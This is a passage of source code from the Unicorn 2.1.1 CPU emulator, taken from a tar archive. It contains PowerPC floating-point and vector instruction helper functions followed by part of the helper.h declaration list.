\ t = *xt; \ dcmx = DCMX(opcode); \ } \ \ for (i = 0; i < nels; i++) { \ sign = tp##_is_neg(xb->fld); \ if (tp##_is_any_nan(xb->fld)) { \ match = extract32(dcmx, 6, 1); \ } else if (tp##_is_infinity(xb->fld)) { \ match = extract32(dcmx, 4 + !sign, 1); \ } else if (tp##_is_zero(xb->fld)) { \ match = extract32(dcmx, 2 + !sign, 1); \ } else if (tp##_is_zero_or_denormal(xb->fld)) { \ match = extract32(dcmx, 0 + !sign, 1); \ } \ \ if (scrf) { \ cc = sign << CRF_LT_BIT | match << CRF_EQ_BIT; \ env->fpscr &= ~FP_FPCC; \ env->fpscr |= cc << FPSCR_FPCC; \ env->crf[BF(opcode)] = cc; \ } else { \ t.tfld = match ? fld_max : 0; \ } \ match = 0; \ } \ if (!scrf) { \ *xt = t; \ } \ } VSX_TEST_DC(xvtstdcdp, 2, xB(opcode), float64, VsrD(i), VsrD(i), UINT64_MAX, 0) VSX_TEST_DC(xvtstdcsp, 4, xB(opcode), float32, VsrW(i), VsrW(i), UINT32_MAX, 0) VSX_TEST_DC(xststdcdp, 1, xB(opcode), float64, VsrD(0), VsrD(0), 0, 1) VSX_TEST_DC(xststdcqp, 1, (rB(opcode) + 32), float128, f128, VsrD(0), 0, 1) void helper_xststdcsp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xb) { uint32_t dcmx, sign, exp; uint32_t cc, match = 0, not_sp = 0; dcmx = DCMX(opcode); exp = (xb->VsrD(0) >> 52) & 0x7FF; sign = float64_is_neg(xb->VsrD(0)); if (float64_is_any_nan(xb->VsrD(0))) { match = extract32(dcmx, 6, 1); } else if (float64_is_infinity(xb->VsrD(0))) { match = extract32(dcmx, 4 + !sign, 1); } else if (float64_is_zero(xb->VsrD(0))) { match = extract32(dcmx, 2 + !sign, 1); } else if (float64_is_zero_or_denormal(xb->VsrD(0)) || (exp > 0 && exp < 0x381)) { match = extract32(dcmx, 0 + !sign, 1); } not_sp = !float64_eq(xb->VsrD(0), float32_to_float64( float64_to_float32(xb->VsrD(0), &env->fp_status), &env->fp_status), &env->fp_status); cc = sign << CRF_LT_BIT | match << CRF_EQ_BIT | not_sp << CRF_SO_BIT; env->fpscr &= ~FP_FPCC; env->fpscr |= cc << FPSCR_FPCC; env->crf[BF(opcode)] = cc; } void helper_xsrqpi(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; uint8_t r = Rrm(opcode); uint8_t ex = Rc(opcode); uint8_t rmc = RMC(opcode); uint8_t rmode = 0; float_status tstat; helper_reset_fpstatus(env); if (r == 0 && rmc == 0) { rmode = float_round_ties_away; } else if (r == 0 && rmc == 0x3) { rmode = fpscr_rn; } else if (r == 1) { switch (rmc) { case 0: rmode = float_round_nearest_even; break; case 1: rmode = float_round_to_zero; break; case 2: rmode = float_round_up; break; case 3: rmode = float_round_down; break; default: abort(); } } tstat = env->fp_status; set_float_exception_flags(0, &tstat); set_float_rounding_mode(rmode, &tstat); t.f128 = float128_round_to_int(xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { if (float128_is_signaling_nan(xb->f128, &tstat)) { float_invalid_op_vxsnan(env, GETPC()); t.f128 = float128_snan_to_qnan(t.f128); } } if (ex == 0 && (tstat.float_exception_flags & float_flag_inexact)) { env->fp_status.float_exception_flags &= ~float_flag_inexact; } helper_compute_fprf_float128(env, t.f128); do_float_check_status(env, GETPC()); *xt = t; } void helper_xsrqpxp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; uint8_t r = Rrm(opcode); uint8_t rmc = RMC(opcode); uint8_t rmode = 0; floatx80 round_res; float_status tstat; helper_reset_fpstatus(env); if (r == 0 && rmc == 0) { rmode = float_round_ties_away; } else if (r == 0 && rmc == 0x3) { rmode = fpscr_rn; } else if (r == 1) { switch (rmc) { case 0: rmode = float_round_nearest_even; break; case 1: rmode = float_round_to_zero; break; case 2: rmode = float_round_up; break; case 3: rmode = float_round_down; break; default: abort(); } } tstat = env->fp_status; set_float_exception_flags(0, &tstat); set_float_rounding_mode(rmode, &tstat); round_res = float128_to_floatx80(xb->f128, &tstat); t.f128 = floatx80_to_float128(round_res, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { if (float128_is_signaling_nan(xb->f128, &tstat)) { float_invalid_op_vxsnan(env, GETPC()); t.f128 = float128_snan_to_qnan(t.f128); } } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } void helper_xssqrtqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xb) { ppc_vsr_t t = { 0 }; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_sqrt(xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { if (float128_is_signaling_nan(xb->f128, &tstat)) { float_invalid_op_vxsnan(env, GETPC()); t.f128 = float128_snan_to_qnan(xb->f128); } else if (float128_is_quiet_nan(xb->f128, &tstat)) { t.f128 = xb->f128; } else if (float128_is_neg(xb->f128) && !float128_is_zero(xb->f128)) { float_invalid_op_vxsqrt(env, 1, GETPC()); t.f128 = float128_default_nan(&env->fp_status); } } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } void helper_xssubqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_sub(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } ������������������������������������unicorn-2.1.1/qemu/target/ppc/helper.h��������������������������������������������������������������0000664�0000000�0000000�00000101335�14675241067�0017656�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_FLAGS_3(raise_exception_err, TCG_CALL_NO_WG, void, env, i32, i32) DEF_HELPER_FLAGS_2(raise_exception, TCG_CALL_NO_WG, void, env, i32) DEF_HELPER_FLAGS_4(tw, TCG_CALL_NO_WG, void, env, tl, tl, i32) #if defined(TARGET_PPC64) DEF_HELPER_FLAGS_4(td, TCG_CALL_NO_WG, void, env, tl, tl, i32) #endif DEF_HELPER_2(store_msr, void, env, tl) DEF_HELPER_1(rfi, void, env) DEF_HELPER_1(rfsvc, void, env) DEF_HELPER_1(40x_rfci, void, env) DEF_HELPER_1(rfci, void, env) DEF_HELPER_1(rfdi, void, env) DEF_HELPER_1(rfmci, void, env) #if defined(TARGET_PPC64) DEF_HELPER_2(pminsn, void, env, i32) DEF_HELPER_1(rfid, void, env) DEF_HELPER_1(hrfid, void, env) DEF_HELPER_2(store_lpcr, void, env, tl) DEF_HELPER_2(store_pcr, void, env, tl) #endif DEF_HELPER_1(check_tlb_flush_local, void, env) DEF_HELPER_1(check_tlb_flush_global, void, env) DEF_HELPER_3(lmw, void, env, tl, i32) DEF_HELPER_FLAGS_3(stmw, TCG_CALL_NO_WG, void, env, tl, i32) DEF_HELPER_4(lsw, void, env, tl, i32, i32) DEF_HELPER_5(lswx, void, env, tl, i32, i32, i32) DEF_HELPER_FLAGS_4(stsw, TCG_CALL_NO_WG, void, env, tl, i32, i32) DEF_HELPER_FLAGS_3(dcbz, TCG_CALL_NO_WG, void, env, tl, i32) DEF_HELPER_FLAGS_3(dcbzep, TCG_CALL_NO_WG, void, env, tl, i32) DEF_HELPER_FLAGS_2(icbi, TCG_CALL_NO_WG, void, env, tl) DEF_HELPER_FLAGS_2(icbiep, TCG_CALL_NO_WG, void, env, tl) DEF_HELPER_5(lscbx, tl, env, tl, i32, i32, i32) #if defined(TARGET_PPC64) DEF_HELPER_4(divdeu, i64, env, i64, i64, i32) DEF_HELPER_4(divde, i64, env, i64, i64, i32) #endif DEF_HELPER_4(divweu, tl, env, tl, tl, i32) DEF_HELPER_4(divwe, tl, env, tl, tl, i32) DEF_HELPER_FLAGS_1(popcntb, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_2(cmpb, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_3(sraw, tl, env, tl, tl) #if defined(TARGET_PPC64) DEF_HELPER_FLAGS_2(cmpeqb, TCG_CALL_NO_RWG_SE, i32, tl, tl) DEF_HELPER_FLAGS_1(popcntw, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_FLAGS_2(bpermd, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_3(srad, tl, env, tl, tl) DEF_HELPER_0(darn32, tl) DEF_HELPER_0(darn64, tl) #endif DEF_HELPER_FLAGS_1(cntlsw32, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(cntlzw32, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_2(brinc, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_1(float_check_status, void, env) DEF_HELPER_1(reset_fpstatus, void, env) DEF_HELPER_2(compute_fprf_float64, void, env, i64) DEF_HELPER_3(store_fpscr, void, env, i64, i32) DEF_HELPER_2(fpscr_clrbit, void, env, i32) DEF_HELPER_2(fpscr_setbit, void, env, i32) DEF_HELPER_FLAGS_1(todouble, TCG_CALL_NO_RWG_SE, i64, i32) DEF_HELPER_FLAGS_1(tosingle, TCG_CALL_NO_RWG_SE, i32, i64) DEF_HELPER_4(fcmpo, void, env, i64, i64, i32) DEF_HELPER_4(fcmpu, void, env, i64, i64, i32) DEF_HELPER_2(fctiw, i64, env, i64) DEF_HELPER_2(fctiwu, i64, env, i64) DEF_HELPER_2(fctiwz, i64, env, i64) DEF_HELPER_2(fctiwuz, i64, env, i64) DEF_HELPER_2(fcfid, i64, env, i64) DEF_HELPER_2(fcfidu, i64, env, i64) DEF_HELPER_2(fcfids, i64, env, i64) DEF_HELPER_2(fcfidus, i64, env, i64) DEF_HELPER_2(fctid, i64, env, i64) DEF_HELPER_2(fctidu, i64, env, i64) DEF_HELPER_2(fctidz, i64, env, i64) DEF_HELPER_2(fctiduz, i64, env, i64) DEF_HELPER_2(frsp, i64, env, i64) DEF_HELPER_2(frin, i64, env, i64) DEF_HELPER_2(friz, i64, env, i64) DEF_HELPER_2(frip, i64, env, i64) DEF_HELPER_2(frim, i64, env, i64) DEF_HELPER_3(fadd, f64, env, f64, f64) DEF_HELPER_3(fsub, f64, env, f64, f64) DEF_HELPER_3(fmul, f64, env, f64, f64) DEF_HELPER_3(fdiv, f64, env, f64, f64) DEF_HELPER_4(fmadd, i64, env, i64, i64, i64) DEF_HELPER_4(fmsub, i64, env, i64, i64, i64) DEF_HELPER_4(fnmadd, i64, env, i64, i64, i64) DEF_HELPER_4(fnmsub, i64, env, i64, i64, i64) DEF_HELPER_2(fsqrt, f64, env, f64) DEF_HELPER_2(fre, i64, env, i64) DEF_HELPER_2(fres, i64, env, i64) DEF_HELPER_2(frsqrte, i64, env, i64) DEF_HELPER_4(fsel, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_2(ftdiv, TCG_CALL_NO_RWG_SE, i32, i64, i64) DEF_HELPER_FLAGS_1(ftsqrt, TCG_CALL_NO_RWG_SE, i32, i64) #define dh_alias_avr ptr #define dh_ctype_avr ppc_avr_t * #define dh_is_signed_avr dh_is_signed_ptr #define dh_alias_vsr ptr #define dh_ctype_vsr ppc_vsr_t * #define dh_is_signed_vsr dh_is_signed_ptr DEF_HELPER_3(vavgub, void, avr, avr, avr) DEF_HELPER_3(vavguh, void, avr, avr, avr) DEF_HELPER_3(vavguw, void, avr, avr, avr) DEF_HELPER_3(vabsdub, void, avr, avr, avr) DEF_HELPER_3(vabsduh, void, avr, avr, avr) DEF_HELPER_3(vabsduw, void, avr, avr, avr) DEF_HELPER_3(vavgsb, void, avr, avr, avr) DEF_HELPER_3(vavgsh, void, avr, avr, avr) DEF_HELPER_3(vavgsw, void, avr, avr, avr) DEF_HELPER_4(vcmpequb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequd, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnew, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtub, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtud, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsd, void, env, avr, avr, avr) DEF_HELPER_4(vcmpeqfp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgefp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtfp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpbfp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequd_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnew_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtub_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtud_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsd_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpeqfp_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgefp_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtfp_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpbfp_dot, void, env, avr, avr, avr) DEF_HELPER_3(vmrglb, void, avr, avr, avr) DEF_HELPER_3(vmrglh, void, avr, avr, avr) DEF_HELPER_3(vmrglw, void, avr, avr, avr) DEF_HELPER_3(vmrghb, void, avr, avr, avr) DEF_HELPER_3(vmrghh, void, avr, avr, avr) DEF_HELPER_3(vmrghw, void, avr, avr, avr) DEF_HELPER_3(vmulesb, void, avr, avr, avr) DEF_HELPER_3(vmulesh, void, avr, avr, avr) DEF_HELPER_3(vmulesw, void, avr, avr, avr) DEF_HELPER_3(vmuleub, void, avr, avr, avr) DEF_HELPER_3(vmuleuh, void, avr, avr, avr) DEF_HELPER_3(vmuleuw, void, avr, avr, avr) DEF_HELPER_3(vmulosb, void, avr, avr, avr) DEF_HELPER_3(vmulosh, void, avr, avr, avr) DEF_HELPER_3(vmulosw, void, avr, avr, avr) DEF_HELPER_3(vmuloub, void, avr, avr, avr) DEF_HELPER_3(vmulouh, void, avr, avr, avr) DEF_HELPER_3(vmulouw, void, avr, avr, avr) DEF_HELPER_3(vmuluwm, void, avr, avr, avr) DEF_HELPER_3(vslo, void, avr, avr, avr) DEF_HELPER_3(vsro, void, avr, avr, avr) DEF_HELPER_3(vsrv, void, avr, avr, avr) DEF_HELPER_3(vslv, void, avr, avr, avr) DEF_HELPER_3(vaddcuw, void, avr, avr, avr) DEF_HELPER_2(vprtybw, void, avr, avr) DEF_HELPER_2(vprtybd, void, avr, avr) DEF_HELPER_2(vprtybq, void, avr, avr) DEF_HELPER_3(vsubcuw, void, avr, avr, avr) DEF_HELPER_FLAGS_5(vaddsbs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vaddshs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vaddsws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubsbs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubshs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubsws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vaddubs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vadduhs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vadduws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsububs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubuhs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubuws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_3(vadduqm, void, avr, avr, avr) DEF_HELPER_4(vaddecuq, void, avr, avr, avr, avr) DEF_HELPER_4(vaddeuqm, void, avr, avr, avr, avr) DEF_HELPER_3(vaddcuq, void, avr, avr, avr) DEF_HELPER_3(vsubuqm, void, avr, avr, avr) DEF_HELPER_4(vsubecuq, void, avr, avr, avr, avr) DEF_HELPER_4(vsubeuqm, void, avr, avr, avr, avr) DEF_HELPER_3(vsubcuq, void, avr, avr, avr) DEF_HELPER_3(vrlb, void, avr, avr, avr) DEF_HELPER_3(vrlh, void, avr, avr, avr) DEF_HELPER_3(vrlw, void, avr, avr, avr) DEF_HELPER_3(vrld, void, avr, avr, avr) DEF_HELPER_4(vsldoi, void, avr, avr, avr, i32) DEF_HELPER_3(vextractub, void, avr, avr, i32) DEF_HELPER_3(vextractuh, void, avr, avr, i32) DEF_HELPER_3(vextractuw, void, avr, avr, i32) DEF_HELPER_3(vextractd, void, avr, avr, i32) DEF_HELPER_3(vinsertb, void, avr, avr, i32) DEF_HELPER_3(vinserth, void, avr, avr, i32) DEF_HELPER_3(vinsertw, void, avr, avr, i32) DEF_HELPER_3(vinsertd, void, avr, avr, i32) DEF_HELPER_2(vextsb2w, void, avr, avr) DEF_HELPER_2(vextsh2w, void, avr, avr) DEF_HELPER_2(vextsb2d, void, avr, avr) DEF_HELPER_2(vextsh2d, void, avr, avr) DEF_HELPER_2(vextsw2d, void, avr, avr) DEF_HELPER_2(vnegw, void, avr, avr) DEF_HELPER_2(vnegd, void, avr, avr) DEF_HELPER_2(vupkhpx, void, avr, avr) DEF_HELPER_2(vupklpx, void, avr, avr) DEF_HELPER_2(vupkhsb, void, avr, avr) DEF_HELPER_2(vupkhsh, void, avr, avr) DEF_HELPER_2(vupkhsw, void, avr, avr) DEF_HELPER_2(vupklsb, void, avr, avr) DEF_HELPER_2(vupklsh, void, avr, avr) DEF_HELPER_2(vupklsw, void, avr, avr) DEF_HELPER_5(vmsumubm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsummbm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vsel, void, env, avr, avr, avr, avr) DEF_HELPER_5(vperm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vpermr, void, env, avr, avr, avr, avr) DEF_HELPER_4(vpkshss, void, env, avr, avr, avr) DEF_HELPER_4(vpkshus, void, env, avr, avr, avr) DEF_HELPER_4(vpkswss, void, env, avr, avr, avr) DEF_HELPER_4(vpkswus, void, env, avr, avr, avr) DEF_HELPER_4(vpksdss, void, env, avr, avr, avr) DEF_HELPER_4(vpksdus, void, env, avr, avr, avr) DEF_HELPER_4(vpkuhus, void, env, avr, avr, avr) DEF_HELPER_4(vpkuwus, void, env, avr, avr, avr) DEF_HELPER_4(vpkudus, void, env, avr, avr, avr) DEF_HELPER_4(vpkuhum, void, env, avr, avr, avr) DEF_HELPER_4(vpkuwum, void, env, avr, avr, avr) DEF_HELPER_4(vpkudum, void, env, avr, avr, avr) DEF_HELPER_3(vpkpx, void, avr, avr, avr) DEF_HELPER_5(vmhaddshs, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmhraddshs, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumuhm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumuhs, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumshm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumshs, void, env, avr, avr, avr, avr) DEF_HELPER_4(vmladduhm, void, avr, avr, avr, avr) DEF_HELPER_FLAGS_2(mtvscr, TCG_CALL_NO_RWG, void, env, i32) DEF_HELPER_FLAGS_1(mfvscr, TCG_CALL_NO_RWG, i32, env) DEF_HELPER_3(lvebx, void, env, avr, tl) DEF_HELPER_3(lvehx, void, env, avr, tl) DEF_HELPER_3(lvewx, void, env, avr, tl) DEF_HELPER_3(stvebx, void, env, avr, tl) DEF_HELPER_3(stvehx, void, env, avr, tl) DEF_HELPER_3(stvewx, void, env, avr, tl) #if defined(TARGET_PPC64) DEF_HELPER_4(lxvl, void, env, tl, vsr, tl) DEF_HELPER_4(lxvll, void, env, tl, vsr, tl) DEF_HELPER_4(stxvl, void, env, tl, vsr, tl) DEF_HELPER_4(stxvll, void, env, tl, vsr, tl) #endif DEF_HELPER_4(vsumsws, void, env, avr, avr, avr) DEF_HELPER_4(vsum2sws, void, env, avr, avr, avr) DEF_HELPER_4(vsum4sbs, void, env, avr, avr, avr) DEF_HELPER_4(vsum4shs, void, env, avr, avr, avr) DEF_HELPER_4(vsum4ubs, void, env, avr, avr, avr) DEF_HELPER_4(vaddfp, void, env, avr, avr, avr) DEF_HELPER_4(vsubfp, void, env, avr, avr, avr) DEF_HELPER_4(vmaxfp, void, env, avr, avr, avr) DEF_HELPER_4(vminfp, void, env, avr, avr, avr) DEF_HELPER_3(vrefp, void, env, avr, avr) DEF_HELPER_3(vrsqrtefp, void, env, avr, avr) DEF_HELPER_3(vrlwmi, void, avr, avr, avr) DEF_HELPER_3(vrldmi, void, avr, avr, avr) DEF_HELPER_3(vrldnm, void, avr, avr, avr) DEF_HELPER_3(vrlwnm, void, avr, avr, avr) DEF_HELPER_5(vmaddfp, void, env, avr, avr, avr, avr) DEF_HELPER_5(vnmsubfp, void, env, avr, avr, avr, avr) DEF_HELPER_3(vexptefp, void, env, avr, avr) DEF_HELPER_3(vlogefp, void, env, avr, avr) DEF_HELPER_3(vrfim, void, env, avr, avr) DEF_HELPER_3(vrfin, void, env, avr, avr) DEF_HELPER_3(vrfip, void, env, avr, avr) DEF_HELPER_3(vrfiz, void, env, avr, avr) DEF_HELPER_4(vcfux, void, env, avr, avr, i32) DEF_HELPER_4(vcfsx, void, env, avr, avr, i32) DEF_HELPER_4(vctuxs, void, env, avr, avr, i32) DEF_HELPER_4(vctsxs, void, env, avr, avr, i32) DEF_HELPER_2(vclzb, void, avr, avr) DEF_HELPER_2(vclzh, void, avr, avr) DEF_HELPER_2(vctzb, void, avr, avr) DEF_HELPER_2(vctzh, void, avr, avr) DEF_HELPER_2(vctzw, void, avr, avr) DEF_HELPER_2(vctzd, void, avr, avr) DEF_HELPER_2(vpopcntb, void, avr, avr) DEF_HELPER_2(vpopcnth, void, avr, avr) DEF_HELPER_2(vpopcntw, void, avr, avr) DEF_HELPER_2(vpopcntd, void, avr, avr) DEF_HELPER_1(vclzlsbb, tl, avr) DEF_HELPER_1(vctzlsbb, tl, avr) DEF_HELPER_3(vbpermd, void, avr, avr, avr) DEF_HELPER_3(vbpermq, void, avr, avr, avr) DEF_HELPER_3(vpmsumb, void, avr, avr, avr) DEF_HELPER_3(vpmsumh, void, avr, avr, avr) DEF_HELPER_3(vpmsumw, void, avr, avr, avr) DEF_HELPER_3(vpmsumd, void, avr, avr, avr) DEF_HELPER_2(vextublx, tl, tl, avr) DEF_HELPER_2(vextuhlx, tl, tl, avr) DEF_HELPER_2(vextuwlx, tl, tl, avr) DEF_HELPER_2(vextubrx, tl, tl, avr) DEF_HELPER_2(vextuhrx, tl, tl, avr) DEF_HELPER_2(vextuwrx, tl, tl, avr) DEF_HELPER_2(vsbox, void, avr, avr) DEF_HELPER_3(vcipher, void, avr, avr, avr) DEF_HELPER_3(vcipherlast, void, avr, avr, avr) DEF_HELPER_3(vncipher, void, avr, avr, avr) DEF_HELPER_3(vncipherlast, void, avr, avr, avr) DEF_HELPER_3(vshasigmaw, void, avr, avr, i32) DEF_HELPER_3(vshasigmad, void, avr, avr, i32) DEF_HELPER_4(vpermxor, void, avr, avr, avr, avr) DEF_HELPER_4(bcdadd, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdsub, i32, avr, avr, avr, i32) DEF_HELPER_3(bcdcfn, i32, avr, avr, i32) DEF_HELPER_3(bcdctn, i32, avr, avr, i32) DEF_HELPER_3(bcdcfz, i32, avr, avr, i32) DEF_HELPER_3(bcdctz, i32, avr, avr, i32) DEF_HELPER_3(bcdcfsq, i32, avr, avr, i32) DEF_HELPER_3(bcdctsq, i32, avr, avr, i32) DEF_HELPER_4(bcdcpsgn, i32, avr, avr, avr, i32) DEF_HELPER_3(bcdsetsgn, i32, avr, avr, i32) DEF_HELPER_4(bcds, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdus, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdsr, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdtrunc, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdutrunc, i32, avr, avr, avr, i32) DEF_HELPER_4(xsadddp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsaddqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_4(xssubdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsmuldp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsmulqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_4(xsdivdp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsdivqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_3(xsredp, void, env, vsr, vsr) DEF_HELPER_3(xssqrtdp, void, env, vsr, vsr) DEF_HELPER_3(xsrsqrtedp, void, env, vsr, vsr) DEF_HELPER_4(xstdivdp, void, env, i32, vsr, vsr) DEF_HELPER_3(xstsqrtdp, void, env, i32, vsr) DEF_HELPER_5(xsmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsmsubdp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmsubdp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_4(xscmpeqdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpgtdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpgedp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpnedp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpexpdp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpexpqp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpodp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpudp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpoqp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpuqp, void, env, i32, vsr, vsr) DEF_HELPER_4(xsmaxdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsmindp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsmaxcdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_5(xsmincdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_5(xsmaxjdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_5(xsminjdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_3(xscvdphp, void, env, vsr, vsr) DEF_HELPER_4(xscvdpqp, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvdpsp, void, env, vsr, vsr) DEF_HELPER_2(xscvdpspn, i64, env, i64) DEF_HELPER_4(xscvqpdp, void, env, i32, vsr, vsr) 